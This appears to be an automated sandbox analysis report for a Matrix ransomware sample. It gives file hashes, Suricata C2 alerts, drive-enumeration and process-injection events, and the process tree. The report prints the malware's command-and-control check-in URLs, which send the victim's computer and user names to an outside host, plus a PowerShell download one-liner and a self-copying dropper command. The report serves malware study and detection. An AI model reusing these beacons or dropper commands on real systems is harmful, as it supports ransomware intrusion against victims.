matrix | 016061f330faaeffdd84628f613a719a2f617c8145909d047b5721429ee5b451

Analysis

max time kernel
77s
max time network
112s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
01-02-2022 08:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Size

1.2MB
MD5

907636b28d162f7110b067a8178fa38c
SHA1

048ae4691fe267e7c8d9eda5361663593747142a
SHA256

6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b
SHA512

501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

Score

10^/10

matrix ransomware suricata

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Signatures

Matrix Ransomware 3 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

Processes:

description	flow	ioc
HTTP URL	17	http://fredstat.000webhostapp.com/addrecord.php?apikey=apikey&compuser=JDQPXOPR\|Admin&sid=V4NSb1G7QKhfhqPI&phase=START
HTTP URL	146	http://fredstat.000webhostapp.com/addrecord.php?apikey=apikey&compuser=JDQPXOPR\|Admin&sid=V4NSb1G7QKhfhqPI&phase=[ALL]0E45F84A59BCFA69
HTTP URL	349	http://fredstat.000webhostapp.com/addrecord.php?apikey=apikey&compuser=JDQPXOPR\|Admin&sid=V4NSb1G7QKhfhqPI&phase=0E45F84A59BCFA69\|7397\|2GB

suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
suricata
Executes dropped EXE 1 IoCs

Processes:

NWpgfCa6.exe

pid process

4868 NWpgfCa6.exe

pid	process
4868	NWpgfCa6.exe

Enumerates connected drives 3 TTPs 22 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe

description	ioc	process
File opened (read-only)	\??\U:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\Q:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\M:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\L:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\I:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\E:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\W:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\X:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\S:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\P:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\N:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\H:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\G:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\F:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\Y:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\V:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\K:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\Z:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\R:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\O:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\J:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\T:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.execmd.exe

description	pid	process	target process
PID 4664 wrote to memory of 2140	4664	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 4664 wrote to memory of 2140	4664	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 4664 wrote to memory of 2140	4664	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 4664 wrote to memory of 4868	4664	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	NWpgfCa6.exe
PID 4664 wrote to memory of 4868	4664	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	NWpgfCa6.exe
PID 4664 wrote to memory of 4868	4664	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	NWpgfCa6.exe
PID 4664 wrote to memory of 1968	4664	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 4664 wrote to memory of 1968	4664	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 4664 wrote to memory of 1968	4664	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	cmd.exe
PID 1968 wrote to memory of 2260	1968	cmd.exe	powershell.exe
PID 1968 wrote to memory of 2260	1968	cmd.exe	powershell.exe
PID 1968 wrote to memory of 2260	1968	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe"
1⤵
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:4664
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWpgfCa6.exe"
  2⤵
  PID:2140
- C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWpgfCa6.exe
  "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWpgfCa6.exe" -n
  2⤵
  - Executes dropped EXE
  PID:4868
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\T1qHFNNa.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1968
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    PID:2260

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWpgfCa6.exe

MD5
907636b28d162f7110b067a8178fa38c

SHA1
048ae4691fe267e7c8d9eda5361663593747142a

SHA256
6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

SHA512
501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWpgfCa6.exe

MD5
907636b28d162f7110b067a8178fa38c

SHA1
048ae4691fe267e7c8d9eda5361663593747142a

SHA256
6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

SHA512
501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

Download Submit